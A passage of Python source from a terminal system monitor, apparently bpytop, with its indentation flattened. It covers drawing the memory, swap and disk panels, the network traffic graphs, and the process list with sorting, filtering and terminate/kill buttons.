f'{THEME.hi_fg("g")}{THEME.title("raph")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if CONFIG.show_disks:
if not "s" in Key.mouse:
Key.mouse["s"] = [[x + w - 6 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x + w - 7)}{THEME.mem_box(Symbol.title_left)}{Fx.b if CONFIG.swap_disk else ""}'
f'{THEME.hi_fg("s")}{THEME.title("wap")}{Fx.ub}{THEME.mem_box(Symbol.title_right)}')
if Collector.collect_interrupt: return
Draw.buffer("mem_misc", out_misc, only_save=True)
try:
#* Mem
cx = 1; cy = 1
out += f'{Mv.to(y, x+1)}{THEME.title}{Fx.b}Total:{mem.string["total"]:>{cls.mem_width - 9}}{Fx.ub}{THEME.main_fg}'
if cls.graph_height > 0:
gli = f'{Mv.l(2)}{THEME.mem_box(Symbol.title_right)}{THEME.div_line}{Symbol.h_line * (cls.mem_width - 1)}{"" if CONFIG.show_disks else THEME.mem_box}{Symbol.title_left}{Mv.l(cls.mem_width - 1)}{THEME.title}'
if cls.graph_height >= 2:
gbg = f'{Mv.l(1)}'
gmv = f'{Mv.l(cls.mem_width - 2)}{Mv.u(cls.graph_height - 1)}'
big_mem: bool = cls.mem_width > 21
for name in cls.mem_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.string[name])))}{Fx.trans(mem.string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{gmv}{str(mem.percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.mem[name](None if cls.resized else mem.percent[name])}{mem.string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'
cy += 1 if not cls.graph_height else cls.graph_height
#* Swap
if cls.swap_on and CONFIG.show_swap and not CONFIG.swap_disk and mem.swap_string:
if h - cy > 5:
if cls.graph_height > 0: out += f'{Mv.to(y+cy, x+cx)}{gli}'
cy += 1
out += f'{Mv.to(y+cy, x+cx)}{THEME.title}{Fx.b}Swap:{mem.swap_string["total"]:>{cls.mem_width - 8}}{Fx.ub}{THEME.main_fg}'
cy += 1
for name in cls.swap_names:
if Collector.collect_interrupt: return
if cls.mem_size > 2:
out += (f'{Mv.to(y+cy, x+cx)}{gli}{name.capitalize()[:None if big_mem else 5]+":":<{1 if big_mem else 6.6}}{Mv.to(y+cy, x+cx + cls.mem_width - 3 - (len(mem.swap_string[name])))}{Fx.trans(mem.swap_string[name])}'
f'{Mv.to(y+cy+1, x+cx)}{gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{gmv}{str(mem.swap_percent[name])+"%":>4}')
cy += 2 if not cls.graph_height else cls.graph_height + 1
else:
out += f'{Mv.to(y+cy, x+cx)}{name.capitalize():{5.5 if cls.mem_size > 1 else 1.1}} {gbg}{Meters.swap[name](None if cls.resized else mem.swap_percent[name])}{mem.swap_string[name][:None if cls.mem_size > 1 else -2]:>{9 if cls.mem_size > 1 else 7}}'; cy += 1 if not cls.graph_height else cls.graph_height
if cls.graph_height > 0 and not cy == h: out += f'{Mv.to(y+cy, x+cx)}{gli}'
#* Disks
if CONFIG.show_disks and mem.disks:
cx = x + cls.mem_width - 1; cy = 0
big_disk: bool = cls.disks_width >= 25
gli = f'{Mv.l(2)}{THEME.div_line}{Symbol.title_right}{Symbol.h_line * cls.disks_width}{THEME.mem_box}{Symbol.title_left}{Mv.l(cls.disks_width - 1)}'
for name, item in mem.disks.items():
if Collector.collect_interrupt: return
if not name in Meters.disks_used:
continue
if cy > h - 2: break
out += Fx.trans(f'{Mv.to(y+cy, x+cx)}{gli}{THEME.title}{Fx.b}{item["name"]:{cls.disks_width - 2}.12}{Mv.to(y+cy, x + cx + cls.disks_width - 11)}{item["total"][:None if big_disk else -2]:>9}')
out += f'{Mv.to(y+cy, x + cx + (cls.disks_width // 2) - (len(item["io"]) // 2) - 2)}{Fx.ub}{THEME.main_fg}{item["io"]}{Fx.ub}{THEME.main_fg}{Mv.to(y+cy+1, x+cx)}'
out += f'Used:{str(item["used_percent"]) + "%":>4} ' if big_disk else "U "
out += f'{Meters.disks_used[name]}{item["used"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 2
if len(mem.disks) * 3 <= h + 1:
if cy > h - 1: break
out += Mv.to(y+cy, x+cx)
out += f'Free:{str(item["free_percent"]) + "%":>4} ' if big_disk else f'{"F "}'
out += f'{Meters.disks_free[name]}{item["free"][:None if big_disk else -2]:>{9 if big_disk else 7}}'
cy += 1
if len(mem.disks) * 4 <= h + 1: cy += 1
except (KeyError, TypeError):
return
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.resized = cls.redraw = False
class NetBox(Box, SubBox):
name = "net"
height_p = 30
width_p = 45
x = 1
y = 1
resized: bool = True
redraw: bool = True
graph_height: Dict[str, int] = {}
symbols: Dict[str, str] = {"download" : "▼", "upload" : "▲"}
buffer: str = "net"
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int
if cls.stat_mode:
width_p = 100
else:
width_p = cls.width_p
cls.width = round(Term.width * width_p / 100)
cls.height = Term.height - Box._b_cpu_h - Box._b_mem_h
cls.y = Term.height - cls.height + 1
cls.box_width = 27 if cls.width > 45 else 19
cls.box_height = 9 if cls.height > 10 else cls.height - 2
cls.box_x = cls.width - cls.box_width - 1
cls.box_y = cls.y + ((cls.height - 2) // 2) - cls.box_height // 2 + 1
cls.graph_height["download"] = round((cls.height - 2) / 2)
cls.graph_height["upload"] = cls.height - 2 - cls.graph_height["download"]
cls.redraw = True
@classmethod
def _draw_bg(cls) -> str:
if cls.proc_mode: return ""
return f'{create_box(box=cls, line_color=THEME.net_box)}\
{create_box(x=cls.box_x, y=cls.box_y, width=cls.box_width, height=cls.box_height, line_color=THEME.div_line, fill=False, title="Download", title2="Upload")}'
@classmethod
def _draw_fg(cls):
if cls.proc_mode: return
net = NetCollector
if net.redraw: cls.redraw = True
if not net.nic: return
out: str = ""
out_misc: str = ""
x, y, w, h = cls.x + 1, cls.y + 1, cls.width - 2, cls.height - 2
bx, by, bw, bh = cls.box_x + 1, cls.box_y + 1, cls.box_width - 2, cls.box_height - 2
reset: bool = bool(net.stats[net.nic]["download"]["offset"])
if cls.resized or cls.redraw:
out_misc += cls._draw_bg()
if not "b" in Key.mouse:
Key.mouse["b"] = [[x+w - len(net.nic[:10]) - 9 + i, y-1] for i in range(4)]
Key.mouse["n"] = [[x+w - 5 + i, y-1] for i in range(4)]
Key.mouse["z"] = [[x+w - len(net.nic[:10]) - 14 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 25)}{THEME.net_box}{Symbol.h_line * (10 - len(net.nic[:10]))}{Symbol.title_left}{Fx.b if reset else ""}{THEME.hi_fg("z")}{THEME.title("ero")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}'
f'{THEME.net_box}{Symbol.title_left}{Fx.b}{THEME.hi_fg("<b")} {THEME.title(net.nic[:10])} {THEME.hi_fg("n>")}{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 6:
if not "a" in Key.mouse: Key.mouse["a"] = [[x+w - 20 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 21 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if net.auto_min else ""}{THEME.hi_fg("a")}{THEME.title("uto")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
if w - len(net.nic[:10]) - 20 > 13:
if not "y" in Key.mouse: Key.mouse["y"] = [[x+w - 26 - len(net.nic[:10]) + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, x+w - 27 - len(net.nic[:10]))}{THEME.net_box(Symbol.title_left)}{Fx.b if CONFIG.net_sync else ""}{THEME.title("s")}{THEME.hi_fg("y")}{THEME.title("nc")}'
f'{Fx.ub}{THEME.net_box(Symbol.title_right)}{Term.fg}')
Draw.buffer("net_misc", out_misc, only_save=True)
cy = 0
for direction in ["download", "upload"]:
strings = net.strings[net.nic][direction]
stats = net.stats[net.nic][direction]
if cls.redraw: stats["redraw"] = True
if stats["redraw"] or cls.resized:
Graphs.net[direction] = Graph(w - bw - 3, cls.graph_height[direction], THEME.gradient[direction], stats["speed"], max_value=net.sync_top if CONFIG.net_sync else stats["graph_top"],
invert=direction != "download", color_max_value=net.net_min.get(direction) if CONFIG.net_color_fixed else None)
out += f'{Mv.to(y if direction == "download" else y + cls.graph_height["download"], x)}{Graphs.net[direction](None if stats["redraw"] else stats["speed"][-1])}'
out += (f'{Mv.to(by+cy, bx)}{THEME.main_fg}{cls.symbols[direction]} {strings["byte_ps"]:<10.10}' +
("" if bw < 20 else f'{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["bit_ps"] + ")":>12.12}'))
cy += 1 if bh != 3 else 2
if bh >= 6:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Top:"}{Mv.to(by+cy, bx+bw - 12)}{"(" + strings["top"] + ")":>12.12}'
cy += 1
if bh >= 4:
out += f'{Mv.to(by+cy, bx)}{cls.symbols[direction]} {"Total:"}{Mv.to(by+cy, bx+bw - 10)}{strings["total"]:>10.10}'
if bh > 2 and bh % 2: cy += 2
else: cy += 1
stats["redraw"] = False
out += (f'{Mv.to(y, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["download"]["graph_top"])}'
f'{Mv.to(y+h-1, x)}{THEME.graph_text(net.sync_string if CONFIG.net_sync else net.strings[net.nic]["upload"]["graph_top"])}')
Draw.buffer(cls.buffer, f'{out_misc}{out}{Term.fg}', only_save=Menu.active)
cls.redraw = cls.resized = False
class ProcBox(Box):
name = "proc"
height_p = 68
width_p = 55
x = 1
y = 1
current_y: int = 0
current_h: int = 0
select_max: int = 0
selected: int = 0
selected_pid: int = 0
last_selection: int = 0
filtering: bool = False
moved: bool = False
start: int = 1
count: int = 0
s_len: int = 0
detailed: bool = False
detailed_x: int = 0
detailed_y: int = 0
detailed_width: int = 0
detailed_height: int = 8
resized: bool = True
redraw: bool = True
buffer: str = "proc"
pid_counter: Dict[int, int] = {}
Box.buffers.append(buffer)
@classmethod
def _calc_size(cls):
width_p: int; height_p: int
if cls.proc_mode:
width_p, height_p = 100, 80
else:
width_p, height_p = cls.width_p, cls.height_p
cls.width = round(Term.width * width_p / 100)
cls.height = round(Term.height * height_p / 100)
if cls.height + Box._b_cpu_h > Term.height: cls.height = Term.height - Box._b_cpu_h
cls.x = Term.width - cls.width + 1
cls.y = Box._b_cpu_h + 1
cls.current_y = cls.y
cls.current_h = cls.height
cls.select_max = cls.height - 3
cls.redraw = True
cls.resized = True
@classmethod
def _draw_bg(cls) -> str:
if cls.stat_mode: return ""
return create_box(box=cls, line_color=THEME.proc_box)
@classmethod
def selector(cls, key: str, mouse_pos: Tuple[int, int] = (0, 0)):
old: Tuple[int, int] = (cls.start, cls.selected)
new_sel: int
if key == "up":
if cls.selected == 1 and cls.start > 1:
cls.start -= 1
elif cls.selected == 1:
cls.selected = 0
elif cls.selected > 1:
cls.selected -= 1
elif key == "down":
if cls.selected == 0 and ProcCollector.detailed and cls.last_selection:
cls.selected = cls.last_selection
cls.last_selection = 0
if cls.selected == cls.select_max and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 1
elif cls.selected < cls.select_max:
cls.selected += 1
elif key == "mouse_scroll_up" and cls.start > 1:
cls.start -= 5
elif key == "mouse_scroll_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += 5
elif key == "page_up" and cls.start > 1:
cls.start -= cls.select_max
elif key == "page_down" and cls.start < ProcCollector.num_procs - cls.select_max + 1:
cls.start += cls.select_max
elif key == "home":
if cls.start > 1: cls.start = 1
elif cls.selected > 0: cls.selected = 0
elif key == "end":
if cls.start < ProcCollector.num_procs - cls.select_max + 1: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.selected < cls.select_max: cls.selected = cls.select_max
elif key == "mouse_click":
if mouse_pos[0] > cls.x + cls.width - 4 and cls.current_y + 1 < mouse_pos[1] < cls.current_y + 1 + cls.select_max + 1:
if mouse_pos[1] == cls.current_y + 2:
cls.start = 1
elif mouse_pos[1] == cls.current_y + 1 + cls.select_max:
cls.start = ProcCollector.num_procs - cls.select_max + 1
else:
cls.start = round((mouse_pos[1] - cls.current_y) * ((ProcCollector.num_procs - cls.select_max - 2) / (cls.select_max - 2)))
else:
new_sel = mouse_pos[1] - cls.current_y - 1 if mouse_pos[1] >= cls.current_y - 1 else 0
if new_sel > 0 and new_sel == cls.selected:
Key.list.insert(0, "enter")
return
elif new_sel > 0 and new_sel != cls.selected:
if cls.last_selection: cls.last_selection = 0
cls.selected = new_sel
elif key == "mouse_unselect":
cls.selected = 0
if cls.start > ProcCollector.num_procs - cls.select_max + 1 and ProcCollector.num_procs > cls.select_max: cls.start = ProcCollector.num_procs - cls.select_max + 1
elif cls.start > ProcCollector.num_procs: cls.start = ProcCollector.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > ProcCollector.num_procs and ProcCollector.num_procs < cls.select_max: cls.selected = ProcCollector.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
if old != (cls.start, cls.selected):
cls.moved = True
Collector.collect(ProcCollector, proc_interrupt=True, redraw=True, only_draw=True)
@classmethod
def _draw_fg(cls):
if cls.stat_mode: return
proc = ProcCollector
if proc.proc_interrupt: return
if proc.redraw: cls.redraw = True
out: str = ""
out_misc: str = ""
n: int = 0
x, y, w, h = cls.x + 1, cls.current_y + 1, cls.width - 2, cls.current_h - 2
prog_len: int; arg_len: int; val: int; c_color: str; m_color: str; t_color: str; sort_pos: int; tree_len: int; is_selected: bool; calc: int
dgx: int; dgw: int; dx: int; dw: int; dy: int
l_count: int = 0
scroll_pos: int = 0
killed: bool = True
indent: str = ""
offset: int = 0
tr_show: bool = True
usr_show: bool = True
vals: List[str]
g_color: str = ""
s_len: int = 0
if proc.search_filter: s_len = len(proc.search_filter[:10])
loc_string: str = f'{cls.start + cls.selected - 1}/{proc.num_procs}'
end: str = ""
if proc.detailed:
dgx, dgw = x, w // 3
dw = w - dgw - 1
if dw > 120:
dw = 120
dgw = w - 121
dx = x + dgw + 2
dy = cls.y + 1
if w > 67:
arg_len = w - 53 - (1 if proc.num_procs > cls.select_max else 0)
prog_len = 15
else:
arg_len = 0
prog_len = w - 38 - (1 if proc.num_procs > cls.select_max else 0)
if prog_len < 15:
tr_show = False
prog_len += 5
if prog_len < 12:
usr_show = False
prog_len += 9
if CONFIG.proc_tree:
tree_len = arg_len + prog_len + 6
arg_len = 0
#* Buttons and titles only redrawn if needed
if cls.resized or cls.redraw:
s_len += len(CONFIG.proc_sorting)
if cls.resized or s_len != cls.s_len or proc.detailed:
cls.s_len = s_len
for k in ["e", "r", "c", "t", "k", "i", "enter", "left", " ", "f", "delete"]:
if k in Key.mouse: del Key.mouse[k]
if proc.detailed:
killed = proc.details["killed"]
main = THEME.main_fg if cls.selected == 0 and not killed else THEME.inactive_fg
hi = THEME.hi_fg if cls.selected == 0 and not killed else THEME.inactive_fg
title = THEME.title if cls.selected == 0 and not killed else THEME.inactive_fg
if cls.current_y != cls.y + 8 or cls.resized or Graphs.detailed_cpu is NotImplemented:
cls.current_y = cls.y + 8
cls.current_h = cls.height - 8
for i in range(7): out_misc += f'{Mv.to(dy+i, x)}{" " * w}'
out_misc += (f'{Mv.to(dy+7, x-1)}{THEME.proc_box}{Symbol.title_right}{Symbol.h_line*w}{Symbol.title_left}'
f'{Mv.to(dy+7, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}{THEME.div_line}')
for i in range(7):
out_misc += f'{Mv.to(dy + i, dgx + dgw + 1)}{Symbol.v_line}'
out_misc += (f'{Mv.to(dy-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(dy-1, dgx + dgw + 1)}{Symbol.div_up}'
f'{Mv.to(dy-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(str(proc.details["pid"]))}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(proc.details["name"][:(dgw - 11)])}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if cls.selected == 0:
Key.mouse["enter"] = [[dx+dw-10 + i, dy-1] for i in range(7)]
if cls.selected == 0 and not killed:
Key.mouse["t"] = [[dx+2 + i, dy-1] for i in range(9)]
out_misc += (f'{Mv.to(dy-1, dx+dw - 11)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{title if cls.selected > 0 else THEME.title}close{Fx.ub} {main if cls.selected > 0 else THEME.main_fg}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(dy-1, dx+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if dw > 28:
if cls.selected == 0 and not killed and not "k" in Key.mouse: Key.mouse["k"] = [[dx + 13 + i, dy-1] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if dw > 39:
if cls.selected == 0 and not killed and not "i" in Key.mouse: Key.mouse["i"] = [[dx + 19 + i, dy-1] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if Graphs.detailed_cpu is NotImplemented or cls.resized:
Graphs.detailed_cpu = Graph(dgw+1, 7, THEME.gradient["cpu"], proc.details_cpu)
Graphs.detailed_mem = Graph(dw // 3, 1, None, proc.details_mem)
cls.select_max = cls.height - 11
y = cls.y + 9
h = cls.height - 10
else:
if cls.current_y != cls.y or cls.resized:
cls.current_y = cls.y
cls.current_h = cls.height
y, h = cls.y + 1, cls.height - 2
out_misc += (f'{Mv.to(y-1, x-1)}{THEME.proc_box}{Symbol.left_up}{Symbol.h_line*w}{Symbol.right_up}'
f'{Mv.to(y-1, x+1)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.title(cls.name)}{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
f'{Mv.to(y+7, x-1)}{THEME.proc_box(Symbol.v_line)}{Mv.r(w)}{THEME.proc_box(Symbol.v_line)}')
cls.select_max = cls.height - 3
sort_pos = x + w - len(CONFIG.proc_sorting) - 7
if not "left" in Key.mouse:
Key.mouse["left"] = [[sort_pos + i, y-1] for i in range(3)]
Key.mouse["right"] = [[sort_pos + len(CONFIG.proc_sorting) + 3 + i, y-1] for i in range(3)]
out_misc += (f'{Mv.to(y-1, x + 8)}{THEME.proc_box(Symbol.h_line * (w - 9))}' +
("" if not proc.detailed else f"{Mv.to(dy+7, dgx + dgw + 1)}{THEME.proc_box(Symbol.div_down)}") +
f'{Mv.to(y-1, sort_pos)}{THEME.proc_box(Symbol.title_left)}{Fx.b}{THEME.hi_fg("<")} {THEME.title(CONFIG.proc_sorting)} '
f'{THEME.hi_fg(">")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 29 + s_len:
if not "e" in Key.mouse: Key.mouse["e"] = [[sort_pos - 5 + i, y-1] for i in range(4)]
out_misc += (f'{Mv.to(y-1, sort_pos - 6)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_tree else ""}'
f'{THEME.title("tre")}{THEME.hi_fg("e")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 37 + s_len:
if not "r" in Key.mouse: Key.mouse["r"] = [[sort_pos - 14 + i, y-1] for i in range(7)]
out_misc += (f'{Mv.to(y-1, sort_pos - 15)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_reversed else ""}'
f'{THEME.hi_fg("r")}{THEME.title("everse")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if w > 47 + s_len:
if not "c" in Key.mouse: Key.mouse["c"] = [[sort_pos - 24 + i, y-1] for i in range(8)]
out_misc += (f'{Mv.to(y-1, sort_pos - 25)}{THEME.proc_box(Symbol.title_left)}{Fx.b if CONFIG.proc_per_core else ""}'
f'{THEME.title("per-")}{THEME.hi_fg("c")}{THEME.title("ore")}{Fx.ub}{THEME.proc_box(Symbol.title_right)}')
if not "f" in Key.mouse or cls.resized: Key.mouse["f"] = [[x+5 + i, y-1] for i in range(6 if not proc.search_filter else 2 + len(proc.search_filter[-10:]))]
if proc.search_filter:
if not "delete" in Key.mouse: Key.mouse["delete"] = [[x+11 + len(proc.search_filter[-10:]) + i, y-1] for i in range(3)]
elif "delete" in Key.mouse:
del Key.mouse["delete"]
out_misc += (f'{Mv.to(y-1, x + 7)}{THEME.proc_box(Symbol.title_left)}{Fx.b if cls.filtering or proc.search_filter else ""}{THEME.hi_fg("f")}{THEME.title}' +
("ilter" if not proc.search_filter and not cls.filtering else f' {proc.search_filter[-(10 if w < 83 else w - 74):]}{(Fx.bl + "█" + Fx.ubl) if cls.filtering else THEME.hi_fg(" del")}') +
f'{THEME.proc_box(Symbol.title_right)}')
main = THEME.inactive_fg if cls.selected == 0 else THEME.main_fg
hi = THEME.inactive_fg if cls.selected == 0 else THEME.hi_fg
title = THEME.inactive_fg if cls.selected == 0 else THEME.title
out_misc += (f'{Mv.to(y+h, x + 1)}{THEME.proc_box}{Symbol.h_line*(w-4)}'
f'{Mv.to(y+h, x+1)}{THEME.proc_box(Symbol.title_left)}{main}{Symbol.up} {Fx.b}{THEME.main_fg("select")} {Fx.ub}'
f'{THEME.inactive_fg if cls.selected == cls.select_max else THEME.main_fg}{Symbol.down}{THEME.proc_box(Symbol.title_right)}'
f'{THEME.proc_box(Symbol.title_left)}{title}{Fx.b}info {Fx.ub}{main}{Symbol.enter}{THEME.proc_box(Symbol.title_right)}')
if not "enter" in Key.mouse: Key.mouse["enter"] = [[x + 14 + i, y+h] for i in range(6)]
if w - len(loc_string) > 34:
if not "t" in Key.mouse: Key.mouse["t"] = [[x + 22 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}t{title}erminate{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 40:
if not "k" in Key.mouse: Key.mouse["k"] = [[x + 33 + i, y+h] for i in range(4)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}k{title}ill{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if w - len(loc_string) > 51:
if not "i" in Key.mouse: Key.mouse["i"] = [[x + 39 + i, y+h] for i in range(9)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}i{title}nterrupt{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
if CONFIG.proc_tree and w - len(loc_string) > 65:
if not " " in Key.mouse: Key.mouse[" "] = [[x + 50 + i, y+h] for i in range(12)]
out_misc += f'{THEME.proc_box(Symbol.title_left)}{Fx.b}{hi}spc {title}collapse{Fx.ub}{THEME.proc_box(Symbol.title_right)}'
#* Processes labels
selected: str = CONFIG.proc_sorting
label: str
if selected == "memory": selected = "mem"
if selected == "threads" and not CONFIG.proc_tree and not arg_len: selected = "tr"
if CONFIG.proc_tree:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{" Tree:":<{tree_len-2}}' + (f'{"Threads: ":<9}' if tr_show else " "*4) + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected in ["pid", "program", "arguments"]: selected = "tree"
else:
label = (f'{THEME.title}{Fx.b}{Mv.to(y, x)}{"Pid:":>7} {"Program:" if prog_len > 8 else "Prg:":<{prog_len}}' + (f'{"Arguments:":<{arg_len-4}}' if arg_len else "") +
((f'{"Threads:":<9}' if arg_len else f'{"Tr:":^5}') if tr_show else "") + (f'{"User:":<9}' if usr_show else "") + f'Mem%{"Cpu%":>11}{Fx.ub}{THEME.main_fg} ' +
(" " if proc.num_procs > cls.select_max else ""))
if selected == "program" and prog_len <= 8: selected = "prg"
selected = selected.split(" ")[0].capitalize()
if CONFIG.proc_mem_bytes: label = label.replace("Mem%", "MemB")
label = label.replace(selected, f'{Fx.u}{selected}{Fx.uu}')
out_misc += label
Draw.buffer("proc_misc", out_misc, only_save=True)
#* Detailed box draw
if proc.detailed:
if proc.details["status"] == psutil.STATUS_RUNNING: stat_color = Fx.b
elif proc.details["status"] in [psutil.STATUS_DEAD, psutil.STATUS_STOPPED, psutil.STATUS_ZOMBIE]: stat_color = f'{THEME.inactive_fg}'
else: stat_color = ""
expand = proc.expand
iw = (dw - 3) // (4 + expand)
iw2 = iw - 1
out += (f'{Mv.to(dy, dgx)}{Graphs.detailed_cpu(None if cls.moved or proc.details["killed"] else proc.details_cpu[-1])}'
f'{Mv.to(dy, dgx)}{THEME.title}{Fx.b}{0 if proc.details["killed"] else proc.details["cpu_percent"]}%{Mv.r(1)}{"" if SYSTEM == "MacOS" else (("C" if dgw < 20 else "Core") + str(proc.details["cpu_num"]))}')
for i, l in enumerate(["C", "P", "U"]):
out += f'{Mv.to(dy+2+i, dgx)}{l}'
for i, l in enumerate(["C", "M", "D"]):
out += f'{Mv.to(dy+4+i, dx+1)}{l}'
out += (f'{Mv.to(dy, dx+1)} {"Status:":^{iw}.{iw2}}{"Elapsed:":^{iw}.{iw2}}' +
(f'{"Parent:":^{iw}.{iw2}}' if dw > 28 else "") + (f'{"User:":^{iw}.{iw2}}' if dw > 38 else "") +
(f'{"Threads:":^{iw}.{iw2}}' if expand > 0 else "") + (f'{"Nice:":^{iw}.{iw2}}' if expand > 1 else "") +
(f'{"IO Read:":^{iw}.{iw2}}' if expand > 2 else "") + (f'{"IO Write:":^{iw}.{iw2}}' if expand > 3 else "") +
(f'{"TTY:":^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+1, dx+1)}{Fx.ub}{THEME.main_fg}{stat_color}{proc.details["status"]:^{iw}.{iw2}}{Fx.ub}{THEME.main_fg}{proc.details["uptime"]:^{iw}.{iw2}} ' +
(f'{proc.details["parent_name"]:^{iw}.{iw2}}' if dw > 28 else "") + (f'{proc.details["username"]:^{iw}.{iw2}}' if dw > 38 else "") +
(f'{proc.details["threads"]:^{iw}.{iw2}}' if expand > 0 else "") + (f'{proc.details["nice"]:^{iw}.{iw2}}' if expand > 1 else "") +
(f'{proc.details["io_read"]:^{iw}.{iw2}}' if expand > 2 else "") + (f'{proc.details["io_write"]:^{iw}.{iw2}}' if expand > 3 else "") +
(f'{proc.details["terminal"][-(iw2):]:^{iw}.{iw2}}' if expand > 4 else "") +
f'{Mv.to(dy+3, dx)}{THEME.title}{Fx.b}{("Memory: " if dw > 42 else "M:") + str(round(proc.details["memory_percent"], 1)) + "%":>{dw//3-1}}{Fx.ub} {THEME.inactive_fg}{"⡀"*(dw//3)}'
f'{Mv.l(dw//3)}{THEME.proc_misc}{Graphs.detailed_mem(None if cls.moved else proc.details_mem[-1])} '
f'{THEME.title}{Fx.b}{proc.details["memory_bytes"]:.{dw//3 - 2}}{THEME.main_fg}{Fx.ub}')
cy = dy + (4 if len(proc.details["cmdline"]) > dw - 5 else 5)
for i in range(ceil(len(proc.details["cmdline"]) / (dw - 5))):
out += f'{Mv.to(cy+i, dx + 3)}{proc.details["cmdline"][((dw-5)*i):][:(dw-5)]:{"^" if i == 0 else "<"}{dw-5}}'
if i == 2: break
#* Checking for selection out of bounds
if cls.start > proc.num_procs - cls.select_max + 1 and proc.num_procs > cls.select_max: cls.start = proc.num_procs - cls.select_max + 1
elif cls.start > proc.num_procs: cls.start = proc.num_procs
if cls.start < 1: cls.start = 1
if cls.selected > proc.num_procs and proc.num_procs < cls.select_max: cls.selected = proc.num_procs
elif cls.selected > cls.select_max: cls.selected = cls.select_max
if cls.selected < 0: cls.selected = 0
#* Start iteration over all processes and info
cy = 1
for n, (pid, items) in enumerate(proc.processes.items(), start=1):
if n < cls.start: continue
l_count += 1
if l_count == cls.selected:
is_selected = True
cls.selected_pid = pid
else: is_selected = False
indent, name, cmd, threads, username, mem, mem_b, cpu = [items.get(v, d) for v, d in [("indent", ""), ("name", ""), ("cmd", ""), ("threads", 0), ("username", "?"), ("mem", 0.0), ("mem_b", 0), ("cpu", 0.0)]]
if CONFIG.proc_tree:
arg_len = 0
offset = tree_len - len(f'{indent}{pid}')
if offset < 1: offset = 0
indent = f'{indent:.{tree_len - len(str(pid))}}'
if offset - len(name) > 12:
cmd = cmd.split(" ")[0].split("/")[-1]
if not cmd.startswith(name):
offset = len(name)
arg_len = tree_len - len(f'{indent}{pid} {name} ') + 2
cmd = f'({cmd[:(arg_len-4)]})'
else:
offset = prog_len - 1
if cpu > 1.0 or pid in Graphs.pid_cpu:
if pid not in Graphs.pid_cpu:
Graphs.pid_cpu[pid] = Graph(5, 1, None, [0])
cls.pid_counter[pid] = 0
elif cpu < 1.0:
cls.pid_counter[pid] += 1
if cls.pid_counter[pid] > 10:
